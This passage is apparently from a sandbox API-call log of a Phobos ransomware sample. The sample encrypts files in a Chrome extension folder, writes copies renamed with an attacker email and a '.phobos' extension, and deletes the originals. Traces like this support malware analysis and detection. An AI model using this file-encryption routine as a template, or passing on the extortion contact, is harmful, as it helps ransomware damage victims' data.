lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0149.138] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.138] CloseHandle (hObject=0x148) returned 1 [0149.138] CloseHandle (hObject=0x190) returned 1 [0149.138] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json")) returned 1 [0149.139] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.140] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=143) returned 1 [0149.140] CloseHandle (hObject=0x190) returned 1 [0149.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png")) returned 0x2020 [0149.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.140] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.140] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.140] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.140] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8f, lpOverlapped=0x0) returned 1 [0149.141] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x90, dwBufLen=0x90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x90) returned 1 [0149.141] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x90, lpOverlapped=0x0) returned 1 [0149.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0149.142] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.142] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.142] CryptDestroyKey (hKey=0xa32d28) returned 1 [0149.142] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.142] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.142] CloseHandle (hObject=0x190) returned 1 [0149.142] CloseHandle (hObject=0x148) returned 1 [0149.142] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png")) returned 1 [0149.143] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.144] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=92) returned 1 [0149.144] CloseHandle (hObject=0x148) returned 1 [0149.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html")) returned 0x2020 [0149.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.144] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.145] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.145] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.145] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.145] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5c, lpOverlapped=0x0) returned 1 [0149.146] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0149.146] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0149.146] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0149.146] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.147] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.147] CryptDestroyKey (hKey=0xa32d28) returned 1 [0149.147] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.147] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.147] CloseHandle (hObject=0x148) returned 1 [0149.147] CloseHandle (hObject=0x190) returned 1 [0149.147] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html")) returned 1 [0149.148] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.148] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=91) returned 1 [0149.148] CloseHandle (hObject=0x190) returned 1 [0149.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js")) returned 0x2020 [0149.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.148] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.148] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.149] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.149] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5b, lpOverlapped=0x0) returned 1 [0149.150] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0149.150] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0149.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0149.150] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.150] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0149.151] CryptDestroyKey (hKey=0xa32d28) returned 1 [0149.151] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0149.151] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.151] CloseHandle (hObject=0x190) returned 1 [0149.151] CloseHandle (hObject=0x148) returned 1 [0149.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js")) returned 1 [0149.152] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.152] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=725) returned 1 [0149.152] CloseHandle (hObject=0x148) returned 1 [0149.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json")) returned 0x2020 [0149.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.152] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.152] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.153] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.153] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2d5, lpOverlapped=0x0) returned 1 [0149.250] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e0) returned 1 [0149.250] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2e0, lpOverlapped=0x0) returned 1 [0149.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.251] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.251] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.251] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.251] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.251] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.251] CloseHandle (hObject=0x148) returned 1 [0149.251] CloseHandle (hObject=0x190) returned 1 [0149.251] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json")) returned 1 [0149.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.253] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=260) returned 1 [0149.253] CloseHandle (hObject=0x190) returned 1 [0149.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json")) returned 0x2020 [0149.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.253] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.253] SetFilePointerEx (in: hFile=0x190, 